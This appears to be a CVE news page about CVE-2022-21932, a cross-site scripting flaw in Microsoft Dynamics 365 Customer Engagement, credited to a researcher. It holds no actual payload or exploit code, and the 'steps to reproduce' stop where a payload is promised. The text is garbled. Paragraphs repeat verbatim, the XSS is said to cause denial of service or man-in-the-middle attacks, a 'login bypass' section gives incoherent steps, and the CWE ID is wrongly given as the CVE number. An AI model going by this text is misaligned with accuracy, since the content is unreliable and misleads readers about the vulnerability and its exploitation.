CVE-2022-21932 Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability.

CVE-2022-21932 Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability.

This script vulnerability has been reported by Satnam Singh. Singh is an independent researcher and has reported multiple vulnerabilities in Microsoft products. In this report, Singh has shared a Proof of Concept (PoC) which can be used to exploit Cross-Site Scripting (XSS) vulnerability in Dynamics 365. This XSS vulnerability can be exploited by an attacker to inject malicious script in to the application and cause a Denial of Service (DoS) or man-in-the-middled (MitM) attack.

Exploitation of this script vulnerability requires user to be logged in to the application. There are multiple ways in which this XSS can be exploited. One of the ways is through direct user-to-user request where an attacker can send a request to a user that has access to that user’s account. Another way is where an attacker can send a request to an admin user which has access to that admin user’s account.
We can see that the XSS which is created through the PoC is present in the login form. This can be exploited by an attacker to send malicious script to the application and cause a DoS or MitM attack.

Description of the vulnerability

The vulnerability has been reported by Satnam Singh, who is an independent researcher and has reported multiple vulnerabilities in Microsoft products. In this report, Singh has shared a Proof of Concept (PoC) which can be used to exploit Cross-Site Scripting (XSS) vulnerability in Dynamics 365. This XSS vulnerability can be exploited by an attacker to inject malicious script in to the application and cause a Denial of Service (DoS) or man-in-the-middled (MitM) attack.
Exploitation of this script vulnerability requires user to be logged in to the application. There are multiple ways in which this XSS can be exploited. One of the ways is through direct user-to-user request where an attacker can send a request to a user that has access to that user’s account. Another way is where an attacker can send a request to an admin user which has access to that admin user’s account.
We can see that the XSS which is created through the PoC is present in the login form. This can be exploited by an attacker to send malicious script to the application and cause a DoS or MitM attack.

Steps to reproduce the demo

Follow the steps below to reproduce the vulnerability.
1. Login to the Dynamics 365 application.
2. Fill in your username and password as per normal and click on login button.
3. Send a POST request to http://mycompanyname/admin/login with following payload:

How to Bypass Dynamics 365 Login Page

To bypass the login page, we need to create a dummy account and set our session cookie to that dummy account. After doing this, we will be able to log in with our fake account.

We can create a dummy user in Dynamics 365 by following these steps:
1) Click on User Accounts (top-right of the screen)
2) Click on Create New User button> Give a name and email address and click Save.
3) You now have a new user - click on their name so you can see their profile information> Go back to the home page

Attack Vector

The PoC which is created by Singh has multiple attack vectors. An attacker can send a request to a user that has access to that user’s account. Another way an attacker can exploit this XSS vulnerability is by sending a request to an admin user which has access to that admin user’s account.
There are multiple ways in which this XSS vulnerability can be exploited and the most common one is through direct user-to-user request where an attacker can send a request to a user that has access to that user’s account and cause a DoS or MitM attack.

CWE Identification

The following text is a brief description of the potential vulnerability. The Common Weakness Enumeration (CWE) ID is CVE-2022-21932.

References

Subscribe to CVE.news
Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
jamie@example.com
Subscribe